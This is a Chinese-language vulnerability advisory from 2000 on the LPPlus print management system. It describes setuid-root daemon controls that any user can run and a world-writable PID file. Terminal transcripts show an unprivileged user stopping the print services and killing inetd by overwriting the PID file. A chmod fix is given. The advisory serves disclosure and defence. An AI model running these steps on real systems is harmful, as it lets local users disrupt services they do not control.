LPPlus 权限配置错误拒绝服务漏洞
发布日期:2000-09-07
更新日期:2000-09-07
受影响系统:
Plus Technologies LPPlus 3.3.0 for Solaris 2.x
Plus Technologies LPPlus 3.2.1 for Linux
描述:
LPPlus 是Plus Technologies出品的一个Unix下的打印管理系统。它存在一些安全问题
漏洞一:
缺省安装时,LPPlus 打印管理系统有几个 setuid root 程序,
它们包括:
$LPHOME/bin/dccsched
$LPHOME/bin/dcclpdser
$LPHOME/bin/dccbkst
这三个程序分别启动任务调度、服务器、网络状态守护进程。
$LPHOME/bin/dccshut
$LPHOME/bin/dcclpdshut
$LPHOME/bin/dccbkstshut
这三个程序分别停止三个守护进程。
缺省时,任何用户无论他/她拥有什么权限都可以运行这六个程序。
这导致任何用户度可以启动或停止打印服务。
漏洞二:
$LPHOME/system/lpdprocess 文件以 777 模式创建。这个文件
包含 dcclpdser 进程的进程号。如果一个用户把它修改成别的进
程的进程号,然后运行 $LPHOME/system/lpdprocess 程序,由于
它是 setuid root 程序,那么他/她就可以关闭任何进程。
<*来源: Dixie Flatline (
echo8@FIREST0RM.ORG) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
漏洞一:
$ id
uid=600(test) gid=300(users)
$ ps -ef|grep dcc
test 26357 26351 0 18:18:06 pts/0 0:00 grep dcc
root 26262 1 0 17:41:50 ? 0:01 /opt/lpplus/bin/dccsched
root 26272 1 0 17:42:03 ? 0:00 /opt/lpplus/bin/dcclpdser
root 26276 1 0 17:42:14 ? 0:00 /opt/lpplus/bin/dccbkst
$ dccbkstshut
$ dcclpdshut
LPD048E Signal sent to dcclpdser to shut down.
$ dccshut
LPP054I LP Plus scheduler ordered to shutdown.
$ ps -ef|grep dcc
test 26253 26239 0 17:39:45 pts/0 0:00 grep dcc
$
漏洞二:
$ id
uid=600(test) gid=300(users)
$ ps -ef|grep inet
test 26285 26279 0 17:42:42 pts/0 0:00 grep inet
root 12276 1 0 Aug 22 ? 0:00 /usr/sbin/inetd -s
$ cat > $LPHOME/system/lpdprocess
12276
^D
$ dcclpdshut
LPD048E Signal sent to dcclpdser to shut down.
$ ps -ef|grep inet
test 26291 26279 0 17:45:17 pts/0 0:00 grep inet
建议:
临时解决办法:
NSFOCUS建议您去除这些程序的suid root位:
chmod u-s $LPHOME/bin/dccsched
chmod u-s $LPHOME/bin/dcclpdser
chmod u-s $LPHOME/bin/dccbkst
chmod u-s $LPHOME/bin/dccshut
chmod u-s $LPHOME/bin/dcclpdshut
chmod u-s $LPHOME/bin/dccbkstshut
厂商补丁:
暂无
浏览次数:5872
严重程度:0(网友投票)